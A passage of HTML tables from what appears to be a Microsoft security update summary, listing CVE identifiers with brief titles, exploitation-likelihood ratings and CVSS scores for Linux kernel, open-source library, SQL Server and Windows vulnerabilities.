href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43309">CVE-2026-43309</a></td><td><p>md raid: fix hang when stopping arrays with metadata through dm-raid</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43416">CVE-2026-43416</a></td><td><p>powerpc, perf: Check that current-&gt;mm is alive before getting user callchain</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-71299">CVE-2025-71299</a></td><td><p>spi: cadence-quadspi: Parse DT for flashes with the rest of the DT parsing</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43284">CVE-2026-43284</a></td><td><p>xfrm: esp: avoid in-place decrypt on shared skb frags</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43352">CVE-2026-43352</a></td><td><p>i3c: mipi-i3c-hci: Correct RING_CTRL_ABORT handling in DMA dequeue</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43300">CVE-2026-43300</a></td><td><p>drm/panel: Fix a possible null-pointer dereference in jdi_panel_dsi_remove()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43331">CVE-2026-43331</a></td><td><p>x86/kexec: Disable KCOV instrumentation after load_segments()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43320">CVE-2026-43320</a></td><td><p>drm/amd/display: Fix dsc eDP issue</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43306">CVE-2026-43306</a></td><td><p>bpf: crypto: Use the correct destructor kfunc type</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43443">CVE-2026-43443</a></td><td><p>ASoC: amd: acp-mach-common: Add missing error check for clock acquisition</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43317">CVE-2026-43317</a></td><td><p>most: core: fix leak on early registration failure</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43319">CVE-2026-43319</a></td><td><p>spi: spidev: fix lock inversion between spi_lock and buf_lock</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43303">CVE-2026-43303</a></td><td><p>mm/page_alloc: clear page-&gt;private in free_pages_prepare()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43344">CVE-2026-43344</a></td><td><p>perf/x86/intel/uncore: Fix die ID init and look up bugs</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43321">CVE-2026-43321</a></td><td><p>bpf: Properly mark live registers for indirect jumps</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43456">CVE-2026-43456</a></td><td><p>bonding: fix type confusion in bond_setup_by_slave()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43305">CVE-2026-43305</a></td><td><p>drm/amd/display: Fix mismatched unlock for DMUB HW lock in HWSS fast path</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43298">CVE-2026-43298</a></td><td><p>drm/amdgpu: Skip vcn poison irq release on VF</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43299">CVE-2026-43299</a></td><td><p>btrfs: do not ASSERT() when the fs flips RO inside btrfs_repair_io_failure()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43400">CVE-2026-43400</a></td><td><p>drm/amdgpu: add upper bound check on user inputs in signal ioctl</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43310">CVE-2026-43310</a></td><td><p>media: verisilicon: Avoid G2 bus error while decoding H.264 and HEVC</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43294">CVE-2026-43294</a></td><td><p>drm: renesas: rz-du: mipi_dsi: fix kernel panic when rebooting for some panels</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43353">CVE-2026-43353</a></td><td><p>i3c: mipi-i3c-hci: Fix race in DMA ring dequeue</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43292">CVE-2026-43292</a></td><td><p>mm/vmalloc: prevent RCU stalls in kasan_release_vmalloc_node</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43398">CVE-2026-43398</a></td><td><p>drm/amdgpu: add upper bound check on user inputs in wait ioctl</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43311">CVE-2026-43311</a></td><td><p>soc/tegra: pmc: Fix unsafe generic_handle_irq() call</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43421">CVE-2026-43421</a></td><td><p>usb: gadget: f_ncm: Fix net_device lifecycle with device_move</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43308">CVE-2026-43308</a></td><td><p>btrfs: don't BUG() on unexpected delayed ref type in run_one_delayed_ref()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-37458">CVE-2026-37458</a></td><td><p></p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-37459">CVE-2026-37459</a></td><td><p></p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33846">CVE-2026-33846</a></td><td><p>Gnutls: gnutls: denial of service via heap buffer overflow in dtls handshake fragment reassembly</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-6664">CVE-2026-6664</a></td><td><p>PgBouncer integer overflow in PgBouncer network packet parsing</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-6665">CVE-2026-6665</a></td><td><p>PgBouncer buffer overflow in SCRAM</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-6667">CVE-2026-6667</a></td><td><p>PgBouncer missing authorization check in KILL_CLIENT admin command</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>4.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-6666">CVE-2026-6666</a></td><td><p>PgBouncer crash in kill_pool_logins_server_error</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-45130">CVE-2026-45130</a></td><td><p>Vim: Heap Buffer Overflow in spell file loading</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>6.6</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-44656">CVE-2026-44656</a></td><td><p>Vim: OS Command Injection via 'path' completion</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33811">CVE-2026-33811</a></td><td><p>Crash when handling long CNAME response in net</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33814">CVE-2026-33814</a></td><td><p>Infinite loop in HTTP/2 transport when given bad SETTINGS_MAX_FRAME_SIZE in net/http/internal/http2 in golang.org/x/net</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-39817">CVE-2026-39817</a></td><td><p>Invoking "go tool pack" does not sanitize output paths in cmd/go</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-39819">CVE-2026-39819</a></td><td><p>Invoking "go bug" follows symlinks in predictable temporary filenames in cmd/go</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-39820">CVE-2026-39820</a></td><td><p>Quadratic string concatentation in consumeComment in net/mail</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-39823">CVE-2026-39823</a></td><td><p>Bypass of meta content URL escaping causes XSS in html/template</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>6.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-39825">CVE-2026-39825</a></td><td><p>ReverseProxy forwards queries with more than urlmaxqueryparams parameters in net/http/httputil</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-39826">CVE-2026-39826</a></td><td><p>Escaper bypass leads to XSS in html/template</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>6.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-39836">CVE-2026-39836</a></td><td><p>Panic in Dial and LookupPort when handling NUL byte on Windows in net</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42499">CVE-2026-42499</a></td><td><p>Quadratic string concatenation in consumePhrase in net/mail</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42501">CVE-2026-42501</a></td><td><p>Malicious module proxy can bypass checksum database in cmd/go</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33079">CVE-2026-33079</a></td><td><p>Mistune ReDoS in LINK_TITLE_RE allows denial of service with crafted Markdown titles</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41889">CVE-2026-41889</a></td><td><p>pgx: SQL Injection via placeholder confusion with dollar quoted string literals</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42257">CVE-2026-42257</a></td><td><p>net-imap: Command Injection via "raw" arguments to multiple commands</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42258">CVE-2026-42258</a></td><td><p>net-imap: Command Injection via unvalidated Symbol inputs</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42256">CVE-2026-42256</a></td><td><p>net-imap: Denial of service via high iteration count for `SCRAM-*` authentication</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42246">CVE-2026-42246</a></td><td><p>net-imap vulnerable to STARTTLS stripping via invalid response timing</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-45186">CVE-2026-45186</a></td><td><p></p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>2.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7261">CVE-2026-7261</a></td><td><p>SoapServer session-persisted object use-after-free via SOAP header fault</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7258">CVE-2026-7258</a></td><td><p>Out-of-bounds read in urldecode() on NetBSD</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-6722">CVE-2026-6722</a></td><td><p>Use-After-Free in SOAP using Apache map</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-6735">CVE-2026-6735</a></td><td><p>XSS within PHP-FPM status endpoint</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7262">CVE-2026-7262</a></td><td><p>NULL pointer dereference in SOAP apache:Map decoder with missing &lt;value&gt;</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-14179">CVE-2025-14179</a></td><td><p>SQL injection in pdo_firebird via NUL bytes in quoted strings</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7568">CVE-2026-7568</a></td><td><p>Signed integer overflow in metaphone()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7259">CVE-2026-7259</a></td><td><p>Null pointer dereference in php_mb_check_encoding() via mb_ereg_search_init()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43500">CVE-2026-43500</a></td><td><p>rxrpc: Also unshare DATA/RESPONSE packets when paged frags are present</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr></tbody></table><p></p><p></p><h3>SQL Server vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40370">CVE-2026-40370</a></td><td><p>SQL Server Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr></tbody></table><h3>Windows vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-54518">CVE-2025-54518</a></td><td><p>AMD: CVE-2025-54518 CPU OP Cache Corruption</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41095">CVE-2026-41095</a></td><td><p>Data Deduplication Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35424">CVE-2026-35424</a></td><td><p>Internet Key Exchange (IKE) Protocol Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40377">CVE-2026-40377</a></td><td><p>Microsoft Cryptographic Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34329">CVE-2026-34329</a></td><td><p>Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41097">CVE-2026-41097</a></td><td><p>Secure Boot Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33839">CVE-2026-33839</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33840">CVE-2026-33840</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34330">CVE-2026-34330</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34331">CVE-2026-34331</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35423">CVE-2026-35423</a></td><td><p>Windows 11 Telnet Client Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>5.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35438">CVE-2026-35438</a></td><td><p>Windows Admin Center Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34344">CVE-2026-34344</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34345">CVE-2026-34345</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35416">CVE-2026-35416</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41088">CVE-2026-41088</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34343">CVE-2026-34343</a></td><td><p>Windows Application Identity (AppID) Subsystem Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35418">CVE-2026-35418</a></td><td><p>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33835">CVE-2026-33835</a></td><td><p>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34337">CVE-2026-34337</a></td><td><p>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40407">CVE-2026-40407</a></td><td><p>Windows Common Log File System Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40397">CVE-2026-40397</a></td><td><p>Windows Common Log File System Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41096">CVE-2026-41096</a></td><td><p>Windows DNS Client Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42896">CVE-2026-42896</a></td><td><p>Windows DWM Core Library Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35419">CVE-2026-35419</a></td><td><p>Windows DWM Core Library Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34336">CVE-2026-34336</a></td><td><p>Windows DWM Core Library Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33834">CVE-2026-33834</a></td><td><p>Windows Event Logging Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32209">CVE-2026-32209</a></td><td><p>Windows Filtering Platform (WFP) Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>4.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35421">CVE-2026-35421</a></td><td><p>Windows GDI Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40403">CVE-2026-40403</a></td><td><p>Windows Graphics Component Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40402">CVE-2026-40402</a></td><td><p>Windows Hyper-V Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>9.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33841">CVE-2026-33841</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35420">CVE-2026-35420</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40369">CVE-2026-40369</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34332">CVE-2026-34332</a></td><td><p>Windows Kernel-Mode Driver Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>8.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34339">CVE-2026-34339</a></td><td><p>Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34341">CVE-2026-34341</a></td><td><p>Windows Link-Layer Discovery Protocol (LLDP) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33838">CVE-2026-33838</a></td><td><p>Windows Message Queuing (MSMQ) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32161">CVE-2026-32161</a></td><td><p>Windows Native WiFi Miniport Driver Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41089">CVE-2026-41089</a></td><td><p>Windows Netlogon Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34342">CVE-2026-34342</a></td><td><p>Windows Print Spooler Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34340">CVE-2026-34340</a></td><td><p>Windows Projected File System Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40398">CVE-2026-40398</a></td><td><p>Windows Remote Desktop Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21530">CVE-2026-21530</a></td><td><p>Windows Rich Text Edit Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32170">CVE-2026-32170</a></td><td><p>Windows Rich Text Edit Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40410">CVE-2026-40410</a></td><td><p>Windows SMB Client Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35415">CVE-2026-35415</a></td><td><p>Windows Storage Spaces Controller Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a 